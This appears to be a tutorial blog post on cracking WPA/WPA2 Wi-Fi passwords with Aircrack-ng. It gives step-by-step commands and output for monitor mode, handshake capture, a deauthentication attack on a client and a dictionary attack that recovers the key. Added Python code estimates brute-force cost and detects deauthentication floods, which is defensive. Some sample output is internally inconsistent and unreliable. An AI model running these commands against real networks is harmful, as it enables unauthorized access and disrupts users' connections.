Aircrack-ng
August 15, 2023 · 12 minute read
Overview
- 1. SSID (Service Set Identifier): The name of the Wi-Fi network that devices use to identify and connect to a network.
- 2. ESSID: An extended network configuration involving multiple access points that share the same SSID to cover a larger network area.
- 3. WEP: An older, out-of-date encryption protocol for Wi-Fi that is now considered insecure.
- 4. WPA/WPA2/WPA3: Secure encryption protocols that provide stronger protection for Wi-Fi networks. The number denotes the generation of the security protocol; each generation builds on the previous one, addressing its vulnerabilities and weaknesses.
- Aircrack-ng: This is the main tool of the suite and is used to capture packets from a wireless network and then perform cryptographic attacks to recover WEP/WPA/WPA2 keys.
- Airmon-ng: Manages wireless network interfaces, including putting them into monitor mode.
- Airodump-ng: Used for capturing packets from wireless networks.
- Aireplay-ng: Used for injecting traffic into wireless networks. This can be used for deauthentication attacks.
- Airbase-ng: Can be used to set up fake access points.
- Airtun-ng: Used to set up encrypted tunnels over a wireless network. Especially useful for securing communication or bypassing network restrictions.
- Airdecap-ng: Used for decrypting captured encrypted traffic.
Cracking Wi-Fi Passwords
- 1. Capturing Packets: The first step is to capture data packets from the target network. These packets contain information about network activity.
- 2. Collecting the Handshake: WPA and WPA2-PSK encrypted networks use a four-way handshake between a client device and an access point when a client wants to connect to the network. To collect these packets we can conduct a deauthentication attack that forces devices to reconnect to the network, and sniff the handshake as they do so.
- 3. Dictionary Attack: Once the handshake is captured, we can use a dictionary attack to attempt to crack the password. Each dictionary entry is hashed and the result is compared against the captured handshake data.
- 4. Brute-Force Attack: If the dictionary attack fails, attackers can resort to a brute-force attack that tries every possible combination of characters until the correct password is found.
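As an added illustration (not part of the original post) of why the dictionary and brute-force steps are slow and where the mitigation lies: WPA/WPA2-PSK stretches the passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as the salt) to produce the Pairwise Master Key, so every guess has to pay that cost. The guessing rate used below is the 3126.25 k/s figure from the aircrack-ng run in the demonstration; the charset/length combinations are constructed, and the known-answer vector is the one published in IEEE 802.11i.

```python
import hashlib

# WPA/WPA2-PSK derives the 256-bit Pairwise Master Key from the passphrase
# with PBKDF2-HMAC-SHA1, salted with the SSID and iterated 4096 times
# (IEEE 802.11i). A dictionary or brute-force attack repeats this per guess.
PBKDF2_ITERATIONS = 4096


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the 32-byte PMK for a passphrase on a given SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, dklen=32)


def keyspace_size(charset_size: int, length: int) -> int:
    """Maximum number of candidates a brute-force attack must try."""
    return charset_size ** length


def seconds_to_exhaust(candidates: int, keys_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guessing rate."""
    return candidates / keys_per_second


def human_duration(seconds: float) -> str:
    """Render a duration in the largest unit that fits."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    # Known-answer test from IEEE 802.11i: passphrase "password", SSID "IEEE".
    print(wpa_pmk("password", "IEEE").hex())
    # Guessing rate observed in the aircrack-ng run on this page (3126.25 k/s).
    rate = 3126.25 * 1000
    # Constructed passphrase policies to compare against that rate.
    for charset, length, label in ((26, 8, "8 lowercase letters"),
                                   (36, 10, "10 lowercase letters and digits"),
                                   (95, 12, "12 printable ASCII characters")):
        n = keyspace_size(charset, length)
        print(f"{label}: {n:.3e} candidates, "
              f"{human_duration(seconds_to_exhaust(n, rate))} worst case")
```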
Practical Demonstration
#Check for processes that might interfere with the aircrack-ng suite and kill them.
┌──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng check kill
Killing these processes:
PID Name
763 wpa_supplicant
#Start monitor mode on the target wireless interface
┌──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng start [WIRELESS INTERFACE NAME]
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
#Ensure that the target wireless interface is in monitor mode
┌──(root㉿kali)-[/home/kali]
└─# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.5 GHz Tx-Power=20 dBm
Retry short limit: 7 RTS thr:off Fragment thr:off
Power Management:off
#Scan for networks. To capture only one network, filter by its BSSID: sudo airodump-ng wlan0mon -d [BSSID OF TARGET NETWORK]
#Otherwise, if no BSSID is specified, airodump-ng will grab data from all networks.
┌──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng wlan0mon
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
7F:9E:2C:1D:A5:8B 25 16 10 0 0 11 51. WPA NETGEAR
BSSID STATION PWR Rate Lost Packets Notes Probes
9D:1E:F0:3B:7A:5C 00:0F:B5:32:31:31 61 16-54 2 18
#Use airodump-ng to sniff the handshake on the target's channel and write the capture to files prefixed "results"
┌──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng -w results -c 11 --bssid 7F:9E:2C:1D:A5:8B wlan0mon
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
7F:9E:2C:1D:A5:8B 25 16 10 0 0 11 51. WPA NETGEAR
BSSID STATION PWR Rate Lost Packets Notes Probes
9D:1E:F0:3B:7A:5C 00:0F:B5:32:31:31 61 16-54 2 18
#Deauthentication attack
# -0 means deauthentication
# 10 is the number of deauthentication packets to send; 0 means send continuously
# -a MAC address of the access point
# -c MAC address of the client to deauth; if omitted, all clients are deauthenticated
# wlan0mon interface name
┌──(root㉿kali)-[/home/kali]
└─# sudo aireplay-ng -0 10 -a 7F:9E:2C:1D:A5:8B -c 9D:1E:F0:3B:7A:5C wlan0mon
11:32:32 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:32 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:33 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35 Sending DeAuth to station -- STMAC: [9D:1E:F0:3B:7A:5C]
#The handshake is captured once the WPA handshake field appears in the airodump-ng header
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 7F:9E:2C:1D:A5:8B
┌──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng stop wlan0mon
#Begin the dictionary attack with a wordlist (airodump-ng -w results wrote the capture to results-01.cap)
┌──(root㉿kali)-[/home/kali]
└─# sudo aircrack-ng results-01.cap -w rockyou.txt
Aircrack-ng 1.4
[00:00:03] 561 keys tested (3126.25 k/s)
KEY FOUND! [ iloveyou ]
Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 35 55 24 EE
Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
63 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC AA 6A 6E D9 62 CD
EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
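The deauthentication step above is also the noisiest part of the procedure from a defender's point of view: aireplay-ng emits bursts of deauthentication frames that a normal network almost never produces. The following is an added detection example, not code from the original post or from the Aircrack-ng project, that flags such bursts. The frame log is constructed for the example and assumes the tab-separated shape of a `tshark -T fields -e frame.time_epoch -e wlan.sa -e wlan.da -e wlan.fc.type_subtype` export; the addresses are the ones from the walkthrough.

```python
from collections import defaultdict, deque

# 802.11 management subtypes that knock a client off the network.
DISCONNECT_SUBTYPES = {"0x000c", "0x000a"}   # deauthentication, disassociation

# Constructed sample frames (not a real capture). Columns: epoch time,
# source MAC, destination MAC, frame type/subtype. 0x0008 = beacon,
# 0x0028 = QoS data, 0x0000 = association request.
SAMPLE_FRAMES = """\
1692100351.904\t7f:9e:2c:1d:a5:8b\tff:ff:ff:ff:ff:ff\t0x0008
1692100352.017\t9d:1e:f0:3b:7a:5c\t7f:9e:2c:1d:a5:8b\t0x0028
1692100352.101\t7f:9e:2c:1d:a5:8b\t9d:1e:f0:3b:7a:5c\t0x000c
1692100352.288\t7f:9e:2c:1d:a5:8b\t9d:1e:f0:3b:7a:5c\t0x000c
1692100353.004\t7f:9e:2c:1d:a5:8b\t9d:1e:f0:3b:7a:5c\t0x000c
1692100353.410\t7f:9e:2c:1d:a5:8b\tff:ff:ff:ff:ff:ff\t0x0008
1692100355.120\t7f:9e:2c:1d:a5:8b\t9d:1e:f0:3b:7a:5c\t0x000c
1692100355.131\t7f:9e:2c:1d:a5:8b\t9d:1e:f0:3b:7a:5c\t0x000c
1692100356.700\t9d:1e:f0:3b:7a:5c\t7f:9e:2c:1d:a5:8b\t0x0000
"""


def parse_frames(text):
    """Yield (timestamp, src, dst, subtype) tuples from the tab-separated export."""
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, subtype = line.split("\t")
            yield float(ts), src.lower(), dst.lower(), subtype.lower()


def find_deauth_floods(frames, threshold=5, window=10.0):
    """Flag (src, dst) pairs that see `threshold` or more deauth/disassoc frames
    inside any `window`-second span. Returns {pair: {count, first, last}}."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerts = {}
    for ts, src, dst, subtype in frames:
        if subtype not in DISCONNECT_SUBTYPES:
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:      # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and (src, dst) not in alerts:
            alerts[(src, dst)] = {"count": len(q), "first": q[0], "last": ts}
    return alerts


if __name__ == "__main__":
    for (src, dst), info in find_deauth_floods(parse_frames(SAMPLE_FRAMES)).items():
        print(f"deauth flood: {src} -> {dst}: {info['count']} frames "
              f"in {info['last'] - info['first']:.1f}s")
```

A real deployment would feed this from a monitor-mode capture or a WIDS rather than a static export, and would tune the threshold to the network's normal roaming behaviour.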